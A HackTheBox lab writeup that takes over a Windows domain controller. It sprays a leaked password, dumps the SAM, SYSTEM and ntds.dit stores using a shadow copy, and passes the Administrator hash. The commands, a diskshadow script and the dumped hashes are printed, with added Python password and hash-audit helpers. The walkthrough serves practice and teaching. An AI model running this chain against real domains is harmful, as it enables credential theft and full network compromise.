Baby

Last Updated: Sep 22, 2025 14:14 | Type: HackTheBox Writeup | Difficulty: Easy

Nmap

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ nmap -sC -sV -Pn 10.129.242.229 -oN ./nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-22 16:14 UTC
Nmap scan report for 10.129.242.229
Host is up (0.33s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-22 06:47:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.93 seconds

The domain is baby.vl (nmap prints it as baby.vl0.), so let's add it to our /etc/hosts.

Continue by generating a hosts file entry with netexec:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb 10.129.242.229 --generate-hosts-file hosts
SMB         10.129.242.229  445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) 

Then append the generated entry to our /etc/hosts.

SMB

First, let's enumerate the SMB service.

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb 10.129.242.229 -u guest -p '' --shares
SMB         10.129.242.229  445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\guest: STATUS_ACCOUNT_DISABLED 
                                                                                                                                                                                
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb 10.129.242.229 -u wither -p '' --shares
SMB         10.129.242.229  445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\wither: STATUS_LOGON_FAILURE

The guest account is disabled, so we cannot use it to enumerate the shares, and we still don't have any other valid credentials here.

LDAP

Next, enumerate the LDAP service. First, list all objects with an anonymous bind:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec ldap BABYDC.baby.vl -u '' -p '' --query "(objectClass=*)" "" | grep "Response for object:"
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Administrator,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Guest,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=krbtgt,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Domain Computers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Schema Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Domain Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Domain Users,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Domain Guests,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Protected Users,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Key Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=dev,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Ian Walker,OU=dev,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=it,CN=Users,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP                     10.129.242.229  389    BABYDC           [+] Response for object: CN=Caroline Robinson,OU=it,DC=baby,DC=vl

Then dump the full attributes of these objects:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec ldap BABYDC.baby.vl -u '' -p '' --query "(sAMAccountName=*)" ""
LDAP        10.129.242.229  389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
LDAP        10.129.242.229  389    BABYDC           [+] baby.vl\: 
LDAP        10.129.242.229  389    BABYDC           [+] Response for object: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl

------

In this output we find something interesting: a description attribute that leaks an initial password.

LDAP        10.129.242.229   389    BABYDC           description          Set initial password to BabyStart123!

I will create a user list from the LDAP data and attempt a password spray with it:

Ashley.Webb
Connor.Wilkinson
dev
Guest
Hugh.George
Jacqueline.Barnett
Joseph.Hughes
Kerry.Wilson
Leonard.Dyer
Teresa.Bell
Caroline.Robinson

Then run the spray:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb BABYDC.baby.vl -u users -p 'BabyStart123!' --continue-on-success
SMB         10.129.242.229  445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\dev:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\Guest:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE 

There is something weird here: Caroline.Robinson:BabyStart123! returns STATUS_PASSWORD_MUST_CHANGE. That means the password is valid, but the account must change it before it can be used. I would like to use Impacket's changepasswd.py:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ changepasswd.py 'Caroline.Robinson:BabyStart123!@BABYDC.baby.vl' -newpass 'wither123'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Changing the password of Builtin\Caroline.Robinson
[*] Connecting to DCE/RPC as Builtin\Caroline.Robinson
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[-] Some password update rule has been violated. For example, the password his

But this password is too simple and fails the password policy.

Let's try a more complex one:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ changepasswd.py 'Caroline.Robinson:BabyStart123!@BABYDC.baby.vl' -newpass 'wither123...'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Changing the password of Builtin\Caroline.Robinson
[*] Connecting to DCE/RPC as Builtin\Caroline.Robinson
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.

Now we can check the password policy:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb BABYDC.baby.vl -u Caroline.Robinson -p wither123... --pass-pol
SMB         10.129.242.229  445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) 
SMB         10.129.242.229  445    BABYDC           [+] baby.vl\Caroline.Robinson:wither123... 
SMB         10.129.242.229  445    BABYDC           [+] Dumping password info for domain: BABY
SMB         10.129.242.229  445    BABYDC           Minimum password length: 7
SMB         10.129.242.229  445    BABYDC           Password history length: 24
SMB         10.129.242.229  445    BABYDC           Maximum password age: 41 days 23 hours 53 minutes 
SMB         10.129.242.229  445    BABYDC           
SMB         10.129.242.229  445    BABYDC           Password Complexity Flags: 000001
SMB         10.129.242.229  445    BABYDC               Domain Refuse Password Change: 0
SMB         10.129.242.229  445    BABYDC               Domain Password Store Cleartext: 0
SMB         10.129.242.229  445    BABYDC               Domain Password Lockout Admins: 0
SMB         10.129.242.229  445    BABYDC               Domain Password No Clear Change: 0
SMB         10.129.242.229  445    BABYDC               Domain Password No Anon Change: 0
SMB         10.129.242.229  445    BABYDC               Domain Password Complex: 1
SMB         10.129.242.229  445    BABYDC           
SMB         10.129.242.229  445    BABYDC           Minimum password age: 1 day 4 minutes 
SMB         10.129.242.229  445    BABYDC           Reset Account Lockout Counter: 30 minutes 
SMB         10.129.242.229  445    BABYDC           Locked Account Duration: 30 minutes 
SMB         10.129.242.229  445    BABYDC           Account Lockout Threshold: None
SMB         10.129.242.229  445    BABYDC           Forced Log off Time: Not Set

Domain Password Complex: 1 means a password must contain characters from at least three of the four categories (uppercase, lowercase, digits, special characters), on top of the minimum length of 7. That is why wither123 was rejected and wither123... was accepted.

We have changed the password successfully; let's check that the credentials are valid for WinRM.
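
To make the policy above concrete, here is an added example (not part of the original writeup) that evaluates candidate passwords against the values netexec reported: minimum length 7 and the standard Windows complexity rule (three of four character classes, and no sAMAccountName or displayName token of 3+ characters inside the password). The account and display names used are assumptions taken from the LDAP output on this page.

```python
import re

# Policy values as reported by `netexec smb ... --pass-pol` in the writeup
POLICY = {"min_length": 7, "complexity": True}

# The four character classes the Windows complexity requirement counts
_CLASSES = {
    "upper": re.compile(r"[A-Z]"),
    "lower": re.compile(r"[a-z]"),
    "digit": re.compile(r"[0-9]"),
    "special": re.compile(r"[^A-Za-z0-9]"),
}
# Delimiters Windows uses to split displayName into tokens
_DELIMS = re.compile(r"[,.\-_ #\t]+")


def classes_present(password):
    """Names of the character classes that occur in the password."""
    return {name for name, rx in _CLASSES.items() if rx.search(password)}


def check_password(password, account_name, display_name="", policy=POLICY):
    """Return the list of policy violations; an empty list means the password is acceptable."""
    problems = []
    if len(password) < policy["min_length"]:
        problems.append(f"shorter than {policy['min_length']} characters")
    if not policy["complexity"]:
        return problems
    present = classes_present(password)
    if len(present) < 3:
        problems.append(
            f"only {len(present)} of 4 character classes ({', '.join(sorted(present))})"
        )
    lowered = password.lower()
    # sAMAccountName is checked whole (skipped if shorter than 3 characters)
    if len(account_name) >= 3 and account_name.lower() in lowered:
        problems.append("contains the account name")
    # displayName is split on delimiters; tokens of 3+ characters must not appear
    for token in _DELIMS.split(display_name):
        if len(token) >= 3 and token.lower() in lowered:
            problems.append(f"contains part of the display name ({token})")
    return problems


if __name__ == "__main__":
    # The two passwords tried in the writeup plus the leaked initial one
    for candidate in ("wither123", "wither123...", "BabyStart123!"):
        print(candidate, "->", check_password(candidate, "Caroline.Robinson") or "OK")
```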

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ nxc winrm BABYDC.baby.vl -u Caroline.Robinson -p wither123...
WINRM       10.129.242.229  5985   BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM       10.129.242.229  5985   BABYDC           [+] baby.vl\Caroline.Robinson:wither123... (Pwn3d!)

Let's use evil-winrm to get a shell:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ evil-winrm -i 10.129.242.229 -u Caroline.Robinson -p wither123...
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami
baby\caroline.robinson

Privilege escalation

First, I check the groups of this account:

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
BABY\it                                    Group            S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Backup Operators would be our target here. Membership of this group grants SeBackupPrivilege and SeRestorePrivilege:

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Here I will show the typical way to abuse this privilege. First, dump the registry hives to files and exfiltrate them:

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> reg save hklm\sam sam 
The operation completed successfully.

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> download sam
                                        
Info: Downloading C:\Users\Caroline.Robinson\Desktop\sam to sam
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> download system

Then I'll use secretsdump.py from Impacket:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ secretsdump.py -sam sam -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

But this hash does not work here: the SAM on a domain controller only holds local accounts, while the domain accounts live in NTDS.dit.

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb BABYDC.baby.vl -u Administrator -H 8d992faed38128ae85e95fa35868bb43
SMB         10.129.242.229  445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) 
SMB         10.129.242.229  445    BABYDC           [-] baby.vl\Administrator:8d992faed38128ae85e95fa35868bb43 STATUS_LOGON_FAILURE 

To dump the domain hashes, I need the C:\Windows\NTDS\ntds.dit file. Unfortunately, I can't copy it directly because it's locked and in use. I can access it through a shadow copy, which I'll generate using diskshadow and the following script:

set verbose on
set context persistent nowriters
set metadata C:\Windows\Temp\wither.cab
add volume c: alias wither
create
expose %wither% e:

Save this as a file named backup and convert it to Windows newlines:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ unix2dos backup
unix2dos: converting file backup to DOS format...

Upload it to Baby and pass it to diskshadow:

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> cd C:\Programdata
*Evil-WinRM* PS C:\Programdata> upload backup
                                        
Info: Uploading /home/wither/Templates/htb-labs/Easy/Baby/backup to C:\Programdata\backup
                                        
Data: 196 bytes of 196 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Programdata> diskshadow /s C:\programdata\backup
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  BABYDC,  9/22/2025 7:39:11 AM

-> set verbose on
-> set context persistent nowriters
-> set metadata C:\Windows\Temp\wither.cab
-> add volume c: alias wither
-> create

Alias wither for shadow ID {9c9ec608-53da-4872-8c17-d70e3b194320} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {b3075aa4-b464-47fc-b23c-e07e6c24f4ad} set as environment variable.
Inserted file Manifest.xml into .cab file wither.cab
Inserted file Dis2B5.tmp into .cab file wither.cab

Querying all shadow copies with the shadow copy set ID {b3075aa4-b464-47fc-b23c-e07e6c24f4ad}

        * Shadow copy ID = {9c9ec608-53da-4872-8c17-d70e3b194320}               %wither%
                - Shadow copy set: {b3075aa4-b464-47fc-b23c-e07e6c24f4ad}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
                - Creation time: 9/22/2025 7:39:11 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: BabyDC.baby.vl
                - Service machine: BabyDC.baby.vl
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %wither% e:
-> %wither% = {9c9ec608-53da-4872-8c17-d70e3b194320}
The shadow copy was successfully exposed as e:\.
->

Now there's a copy of the C: drive at E:

*Evil-WinRM* PS C:\Programdata> ls E:\


    Directory: E:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         8/19/2021   6:24 AM                EFI
d-----         4/16/2025   9:17 AM                inetpub
d-----          5/8/2021   8:20 AM                PerfLogs
d-r---         4/16/2025   8:35 AM                Program Files
d-----         4/16/2025   9:38 AM                Program Files (x86)
d-r---         7/27/2024  10:27 PM                Users
d-----         8/20/2025   9:07 AM                Windows

We can use robocopy to get the NTDS.dit file out:

*Evil-WinRM* PS C:\Programdata> robocopy /b E:\Windows\ntds . ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Monday, September 22, 2025 7:40:45 AM
   Source : E:\Windows\ntds\
     Dest : C:\Programdata\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    E:\Windows\ntds\
            New File              16.0 m        ntds.dit

We can download ntds.dit and dump the hashes from it using secretsdump.py, reusing the SYSTEM hive saved earlier for the boot key:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ secretsdump.py -ntds ntds.dit -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
baby.vl\Jacqueline.Barnett:1104:aad3b435b51404eeaad3b435b51404ee:20b8853f7aa61297bfbc5ed2ab34aed8:::
baby.vl\Ashley.Webb:1105:aad3b435b51404eeaad3b435b51404ee:02e8841e1a2c6c0fa1f0becac4161f89:::
baby.vl\Hugh.George:1106:aad3b435b51404eeaad3b435b51404ee:f0082574cc663783afdbc8f35b6da3a1:::
baby.vl\Leonard.Dyer:1107:aad3b435b51404eeaad3b435b51404ee:b3b2f9c6640566d13bf25ac448f560d2:::
baby.vl\Ian.Walker:1108:aad3b435b51404eeaad3b435b51404ee:0e440fd30bebc2c524eaaed6b17bcd5c:::
baby.vl\Connor.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:e125345993f6258861fb184f1a8522c9:::
baby.vl\Joseph.Hughes:1112:aad3b435b51404eeaad3b435b51404ee:31f12d52063773769e2ea5723e78f17f:::
baby.vl\Kerry.Wilson:1113:aad3b435b51404eeaad3b435b51404ee:181154d0dbea8cc061731803e601d1e4:::
baby.vl\Teresa.Bell:1114:aad3b435b51404eeaad3b435b51404ee:7735283d187b758f45c0565e22dc20d8:::
baby.vl\Caroline.Robinson:1115:aad3b435b51404eeaad3b435b51404ee:5fa67a134024d41bb4ff8bfd7da5e2b5:::
[*] Kerberos keys from ntds.dit 
[*] Cleaning up... 

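The writeup dumps two credential stores, the local SAM and NTDS.dit, and only the second Administrator hash works against the domain. The following added example (not from the original writeup) parses secretsdump-style lines from both dumps, shows that the two Administrator NT hashes differ, and flags the hygiene problems a defender would look for in such a dump (empty passwords, LM hashes still stored, identical NT hashes across accounts). The sample input is copied from the outputs shown on this page.

```python
import re

# Well-known hashes: LM of an empty string (LM storage disabled) and NT of an empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input: lines taken from the SAM and NTDS dumps in the writeup
SAM_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

NTDS_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
baby.vl\\Caroline.Robinson:1115:aad3b435b51404eeaad3b435b51404ee:5fa67a134024d41bb4ff8bfd7da5e2b5:::
"""

# secretsdump format: [domain\]user:rid:lmhash:nthash:::  (status lines start with "[*]")
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+)"
    r":(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_dump(text):
    """Map each account name to its RID, LM hash, NT hash and optional domain prefix."""
    entries = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries[m["user"]] = {
                "rid": int(m["rid"]),
                "lm": m["lm"],
                "nt": m["nt"],
                "domain": m["domain"],
            }
    return entries


def audit(entries):
    """Return human-readable findings about weak credential hygiene in a dump."""
    findings = []
    first_seen = {}  # NT hash -> first account that used it
    for user, e in entries.items():
        if e["lm"] != EMPTY_LM:
            findings.append(f"{user}: LM hash stored")
        if e["nt"] == EMPTY_NT:
            findings.append(f"{user}: empty password")
        elif e["nt"] in first_seen:  # identical NT hash means an identical password
            findings.append(f"{user}: same password as {first_seen[e['nt']]}")
        first_seen.setdefault(e["nt"], user)
    return findings


def admin_hash_differs(sam, ntds):
    """True when the local SAM Administrator hash is not the domain Administrator hash."""
    return sam["Administrator"]["nt"] != ntds["Administrator"]["nt"]


if __name__ == "__main__":
    sam, ntds = parse_dump(SAM_DUMP), parse_dump(NTDS_DUMP)
    print("SAM and NTDS Administrator hashes differ:", admin_hash_differs(sam, ntds))
    for name, dump in (("SAM", sam), ("NTDS", ntds)):
        for finding in audit(dump):
            print(f"[{name}] {finding}")
```

The differing Administrator hashes are exactly why the first pass-the-hash attempt in the writeup fails and the second succeeds.
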
Then let's validate this hash:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ netexec smb BABYDC.baby.vl -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d
SMB         10.129.242.229  445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) 
SMB         10.129.242.229  445    BABYDC           [+] baby.vl\Administrator:ee4457ae59f1e3fbd764e33d9cef123d (Pwn3d!)

We can use this hash to get an Administrator shell:

┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Baby]
└─$ evil-winrm -i BABYDC.baby.vl -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Description

A very basic AD domain machine; abusing SeBackupPrivilege for privilege escalation is also a very common technique.